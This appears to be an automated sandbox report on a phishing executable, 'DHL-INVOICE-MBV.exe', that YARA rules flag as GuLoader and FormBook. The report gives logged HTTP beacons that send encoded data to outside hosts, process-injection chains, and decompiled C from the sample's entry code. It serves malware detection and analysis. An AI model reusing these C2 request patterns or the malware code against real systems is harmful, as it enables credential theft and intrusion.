Oct 26, 2022 13:20:50.837747097 CEST	2069	OUT	Data Raw: 78 30 63 62 50 31 73 30 78 7a 64 50 63 45 36 63 55 68 49 4f 5a 51 37 45 7e 4c 73 56 37 51 61 4b 34 6c 6d 2d 37 6d 49 39 51 70 6e 4d 76 33 44 32 4a 66 4d 46 4c 2d 43 75 4c 35 4a 63 4d 49 6a 7a 71 52 4f 36 64 5f 6a 41 79 69 7e 53 61 76 63 63 4b 32 Data Ascii: x0cbP1s0xzdPcE6cUhIOZQ7E~LsV7QaK4lm-7mI9QpnMv3D2JfMFL-CuL5JcMIjzqRO6d_jAyi~SavccK2I1eFyTDwRfLmcoz9QD5bjODfdXxZxpUXfGyeFq88yiKK8FQJkLFcJ_MHF4HQhAQIaAzob7I-Jq(pEohp9rO5(Y5WRfv_QgpEIFr9jFgwYSpLx4ZZzn4vrNEWZ1FJ5xg9qVvvJhvA7U93nzrqDl6wEGZO(2OoWHRtn
Oct 26, 2022 13:20:50.837946892 CEST	2082	OUT	Data Raw: 63 74 72 50 73 59 65 34 28 4a 59 73 67 4b 31 51 35 54 67 59 7e 51 73 4d 6c 34 6f 6a 6f 6e 44 72 39 73 7e 41 51 61 48 65 65 32 66 43 54 4d 6c 47 72 33 4d 50 37 32 78 46 77 66 5a 52 78 42 4c 46 51 34 54 5f 57 4e 36 34 4c 2d 76 39 5a 75 79 31 76 4d Data Ascii: ctrPsYe4(JYsgK1Q5TgY~QsMl4ojonDr9s~AQaHee2fCTMlGr3MP72xFwfZRxBLFQ4T_WN64L-v9Zuy1vMorC2uBSTyOnM4ymmlipK4mGIyrIsJBknyiCY(-HF25wPN0vwbbKZP071he857huJ4jmmVFpY9qTtd1Oo~C98t6CqwbOWZ-Ixds(PAB~UYYVnXBPzXX8DEZ(2Mp5y5hIb8BSeQ0rskGvTYj4NJdfvyQ8_(2ryoGPQ~
Oct 26, 2022 13:20:50.838104963 CEST	2089	OUT	Data Raw: 73 54 4a 58 69 4e 56 38 55 61 5a 70 7e 39 49 6a 6d 77 51 2d 31 32 56 6b 78 32 74 65 42 50 4b 7a 45 76 32 51 77 45 78 55 50 69 52 70 49 55 31 44 58 4f 45 33 37 58 69 68 46 47 75 35 48 73 5a 5f 77 75 57 2d 4e 41 79 62 4f 4e 57 64 75 76 45 67 6b 6f Data Ascii: sTJXiNV8UaZp~9IjmwQ-12Vkx2teBPKzEv2QwExUPiRpIU1DXOE37XihFGu5HsZ_wuW-NAybONWduvEgkoSnKeg-CxIPlQmXx3ZjRM~Eeco6NMK46Ah8RHLhQXQyBNrVmrDVHpKdoO6bN6edQ3O4snn1q4R7H5T0isEinHZkWypte3CkPMCemC(GZAqkIlodzH2q0peJAJ3FNVSdTvMaSIzSjUmG82z2tbrHPUJfe_pQqKzMx4~
Oct 26, 2022 13:20:50.838254929 CEST	2090	OUT	Data Raw: 6c 4c 51 31 30 71 67 6b 49 72 33 31 31 6e 79 46 78 6f 57 68 62 72 5a 33 50 6b 4f 78 57 46 48 42 49 74 59 5f 6c 77 73 33 50 2d 43 59 31 4c 7a 4c 72 42 71 48 75 49 76 46 58 45 36 65 59 59 42 76 42 59 33 51 71 66 67 4f 4c 65 78 52 69 34 67 50 79 73 Data Ascii: lLQ10qgkIr311nyFxoWhbrZ3PkOxWFHBItY_lws3P-CY1LzLrBqHuIvFXE6eYYBvBY3QqfgOLexRi4gPysoE9Lm2wQSKIHFaAAjFV3uBGm5LwyOlxrztxmHFW6H5wQo_t03oAi3qeVXYGWl1npy5HDPqo71O9ND1M8vBzpbf6VxgMSaj(Wc3h76iG56xwvpZStwP2_qfB9AZThFahmvmx_I-688jeOPSLASO1TJwgRry6CNrA10
Oct 26, 2022 13:20:50.838403940 CEST	2090	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:20:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0
Oct 26, 2022 13:20:50.849016905 CEST	2093	OUT	Data Raw: 30 43 37 6b 51 4f 72 75 51 59 7e 43 28 50 71 50 46 61 71 4e 47 44 4b 75 6c 42 72 6c 53 71 37 54 74 4e 5a 52 49 70 33 6b 64 51 7e 71 74 37 31 54 46 6d 34 50 7e 50 33 75 51 53 56 41 36 4e 50 44 4a 6a 4e 44 42 43 63 6d 79 34 46 6e 4b 55 41 76 57 38 Data Ascii: 0C7kQOruQY~C(PqPFaqNGDKulBrlSq7TtNZRIp3kdQ~qt71TFm4P~P3uQSVA6NPDJjNDBCcmy4FnKUAvW8tUBzRfUvAe1bDQ6EHZ9Yb_aG6um857CyBqSlaMji3DCPdmYkbwD3VpJbCdOucjKyt7rzFGaro6PZTgeZTtUXC3rPDrYwY1tlcEb7wFBWMdtzT41-QvtOdPT6TiNSAPNetQd9LZ~grSxkMKYyP6rmq7AE6ttMJMElo
Oct 26, 2022 13:20:50.849168062 CEST	2104	OUT	Data Raw: 32 59 5a 4d 46 49 7e 68 52 4b 4e 56 58 48 61 59 57 31 35 5f 6d 76 76 33 77 53 39 44 4c 6c 52 67 63 54 4f 4b 66 38 54 65 6b 43 47 6c 45 76 71 33 38 54 38 54 74 37 51 31 4b 69 44 43 53 75 63 37 39 43 28 76 66 4c 63 58 35 58 44 68 51 52 42 35 59 39 Data Ascii: 2YZMFI~hRKNVXHaYW15_mvv3wS9DLlRgcTOKf8TekCGlEvq38T8Tt7Q1KiDCSuc79C(vfLcX5XDhQRB5Y9xa310DwO~fhVf06oT4j-CeKWOpIcPGxqI-sn09(-gfXDVTbkDkuF5wweTqiJxlWpYMuzpbsGljPM4X5Js_oQz0hbfKZABGuNn-NxvAnrsOq80M7HfMtEO6scomTI83MCXB0UToNU5pHhICrvtSzjWiBBnWvQdpQ5q

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.11.20	49943	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:52.857459068 CEST	2105	OUT	GET /d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:20:52.868273973 CEST	2105	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:20:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.11.20	49944	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:57.914378881 CEST	2107	OUT	POST /d0ad/ HTTP/1.1 Host: www.christophersubala.online Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.christophersubala.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.christophersubala.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4b 76 7e 53 6f 6e 46 58 49 34 58 43 6f 4d 4e 77 49 64 44 71 61 68 6b 45 31 69 33 42 4a 51 65 61 59 55 6f 51 70 67 55 33 42 45 65 69 31 61 36 7a 47 31 47 4f 56 61 37 54 30 41 44 64 48 41 28 53 68 4c 75 48 51 38 44 52 59 38 71 32 4a 70 71 33 4b 4d 59 7a 7e 7a 57 69 54 30 56 51 4e 58 36 58 58 59 56 54 65 35 44 50 41 32 5a 79 57 38 33 6e 4b 4d 44 48 75 4f 4a 6f 70 59 59 43 52 6a 32 33 7a 67 38 57 52 4b 33 79 34 61 49 48 55 63 6a 77 6c 77 45 45 53 43 41 48 4a 6f 43 6e 34 43 54 48 5a 4a 47 69 4b 55 37 6c 43 73 4d 4b 52 64 4a 51 6f 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=Kv~SonFXI4XCoMNwIdDqahkE1i3BJQeaYUoQpgU3BEei1a6zG1GOVa7T0ADdHA(ShLuHQ8DRY8q2Jpq3KMYz~zWiT0VQNX6XXYVTe5DPA2ZyW83nKMDHuOJopYYCRj23zg8WRK3y4aIHUcjwlwEESCAHJoCn4CTHZJGiKU7lCsMKRdJQow).
Oct 26, 2022 13:20:57.930967093 CEST	2108	IN	HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-c39653c x-version: c39653c x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Wed, 26 Oct 2022 11:20:57 GMT keep-alive: timeout=5 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please
Oct 26, 2022 13:20:57.931018114 CEST	2108	IN	Data Raw: 63 6f 6e 74 61 63 74 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: contact the site owner.</p> </div> </div></div></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL-INVOICE-MBV.exePID: 6028, Parent PID: 4672

General

Target ID:	1
Start time:	13:13:35
Start date:	26/10/2022
Path:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
Imagebase:	0x400000
File size:	277843 bytes
MD5 hash:	97516CE29DC27C8EEB9F7B38D4611577
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: DHL-INVOICE-MBV.exePID: 4144, Parent PID: 6028

General

Target ID:	3
Start time:	13:14:01
Start date:	26/10/2022
Path:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
Imagebase:	0x400000
File size:	277843 bytes
MD5 hash:	97516CE29DC27C8EEB9F7B38D4611577
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.17788417365.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: RAVCpl64.exePID: 7188, Parent PID: 4144

General

Target ID:	4
Start time:	13:14:29
Start date:	26/10/2022
Path:	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
Imagebase:	0x140000000
File size:	16696840 bytes
MD5 hash:	731FB4B2E5AFBCADAABB80D642E056AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: WWAHost.exePID: 1436, Parent PID: 7188

General

Target ID:	5
Start time:	13:14:31
Start date:	26/10/2022
Path:	C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WWAHost.exe
Imagebase:	0x950000
File size:	886080 bytes
MD5 hash:	7C7EDAD5BDA9C34FD50C3A58429C90F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4672, Parent PID: 1436

General

Target ID:	10
Start time:	13:14:44
Start date:	26/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff7ddfa0000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: firefox.exePID: 6560, Parent PID: 1436

General

Target ID:	11
Start time:	13:15:30
Start date:	26/10/2022
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Mozilla Firefox\Firefox.exe
Imagebase:	0x7ff6e44f0000
File size:	597432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: DHL-INVOICE-MBV.exePID: 6028, Parent PID: 4672COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	20.8%
Signature Coverage:	25.8%
Total number of Nodes:	1988
Total number of Limit Nodes:	78

Executed Functions

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t62;
				void* _t65;
				void* _t67;
				int _t69;
				int _t71;
				int _t74;
				intOrPtr* _t75;
				int _t76;
				int _t78;
				void* _t102;
				signed int _t119;
				void* _t122;
				void* _t127;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				int _t150;
				void* _t153;
				int _t154;
				signed int _t158;
				signed int _t163;
				signed int _t168;
				void* _t170;
				WCHAR* _t171;
				signed int _t174;
				signed int _t177;
				CHAR* _t178;
				void* _t181;
				int* _t183;
				void* _t191;
				char* _t192;
				void* _t195;
				void* _t196;
				void* _t242;

				_t170 = 0x20;
				_t150 = 0;
				 *(_t196 + 0x14) = 0;
				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t196 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a20c = _t51;
				if(_t51 != 6) {
					_t148 = E0040665E(0);
					if(_t148 != 0) {
						 *_t148(0xc00);
					}
				}
				_t178 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t191);
				__imp__OleInitialize(_t150); // executed
				 *0x42a2d8 = _t56;
				SHGetFileInfoW(0x4216a8, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
				E00406284(0x429200, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t192 = L"\"C:\\Users\\Arthur\\Desktop\\DHL-INVOICE-MBV.exe\"";
				E00406284(_t192, _t60);
				 *0x42a200 = 0x400000;
				_t62 = _t192;
				if(L"\"C:\\Users\\Arthur\\Desktop\\DHL-INVOICE-MBV.exe\"" == 0x22) {
					_t62 =  &M00435002;
					_t170 = 0x22;
				}
				_t154 = CharNextW(E00405B86(_t62, _t170));
				 *(_t196 + 0x18) = _t154;
				_t65 =  *_t154;
				if(_t65 == _t150) {
					L33:
					_t171 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t171);
					_t67 = E00403328(_t154, 0);
					_t224 = _t67;
					if(_t67 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t69 = E00402EDD(_t226,  *(_t196 + 0x1c)); // executed
						 *(_t196 + 0x10) = _t69;
						if(_t69 != _t150) {
							L48:
							E0040389A();
							__imp__OleUninitialize();
							_t238 =  *(_t196 + 0x10) - _t150;
							if( *(_t196 + 0x10) == _t150) {
								__eflags =  *0x42a2b4 - _t150;
								if( *0x42a2b4 == _t150) {
									L72:
									_t71 =  *0x42a2cc;
									__eflags = _t71 - 0xffffffff;
									if(_t71 != 0xffffffff) {
										 *(_t196 + 0x10) = _t71;
									}
									ExitProcess( *(_t196 + 0x10));
								}
								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
								__eflags = _t74;
								if(_t74 != 0) {
									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
									 *(_t196 + 0x34) = 1;
									 *(_t196 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
								}
								_t75 = E0040665E(4);
								__eflags = _t75 - _t150;
								if(_t75 == _t150) {
									L70:
									_t76 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t76;
									if(_t76 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
									__eflags = _t78;
									if(_t78 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058EA( *(_t196 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a220 == _t150) {
							L47:
							 *0x42a2cc =  *0x42a2cc | 0xffffffff;
							 *(_t196 + 0x14) = E00403974( *0x42a2cc);
							goto L48;
						}
						_t183 = E00405B86(_t192, _t150);
						if(_t183 < _t192) {
							L44:
							_t235 = _t183 - _t192;
							 *(_t196 + 0x10) = L"Error launching installer";
							if(_t183 < _t192) {
								_t181 = E00405855(_t238);
								lstrcatW(_t171, L"~nsu");
								if(_t181 != _t150) {
									lstrcatW(_t171, "A");
								}
								lstrcatW(_t171, L".tmp");
								_t194 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t171, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t171);
									if(_t181 == _t150) {
										E00405838();
									} else {
										E004057BB();
									}
									SetCurrentDirectoryW(_t171);
									_t242 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical" - _t150; // 0x43
									if(_t242 == 0) {
										E00406284(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical", _t194);
									}
									E00406284(0x42b000,  *(_t196 + 0x18));
									_t155 = "A" & 0x0000ffff;
